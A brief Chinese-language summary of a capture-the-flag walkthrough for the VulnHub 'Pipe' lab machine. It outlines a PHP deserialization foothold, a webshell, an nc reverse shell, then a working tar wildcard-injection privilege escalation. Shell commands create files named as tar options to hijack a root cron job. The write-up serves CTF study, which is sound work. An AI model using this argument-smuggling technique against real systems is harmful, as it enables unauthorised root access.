国外大牛的CTF通关攻略
https://highon.coffee/blog/pipe-ctf-walkthrough/
wget -c https://download.vulnhub.com/devrandom/pipe.ova
发现PHP序列化,结合后台日志文件代码泄漏,
利用代码中的file_put_contents写入一句话木马
nc反弹连接
上传linux_system_enum.sh搜集主机信息,
发现了crontab中root每隔五分钟执行一次,存在tar czf backup.tar.gz *
星号存在问题,设法在该目录构造参数化的文件名,利用
[jason@kali2017:/tmp/t]$ echo > --checkpoint=1
[jason@kali2017:/tmp/t]$ echo >--checkpoint-action=exec=sh\ pass.sh
[jason@kali2017:/tmp/t]$ echo 'echo > /home/jason/xxxxxxx.ok' > pass.sh
[jason@kali2017:/tmp/t]$ vim pass.sh
[jason@kali2017:/tmp/t]$ tar zcf z.tar.gz * --------------利用了crontab中的这一句话
[jason@kali2017:/tmp/t]$ ls
--checkpoint=1 --checkpoint-action=exec=sh pass.sh Cknife.db Config.ini pass.sh x x.tar.gz z.tar.gz
[jason@kali2017:/tmp/t]$ ls /home/jason/
a Documents GitHack Music Public Videos vshare
Desktop Downloads linux-local-enum.sh Pictures Templates VirtualBox VMs xxxxxxx.ok
浙公网安备 33010602011771号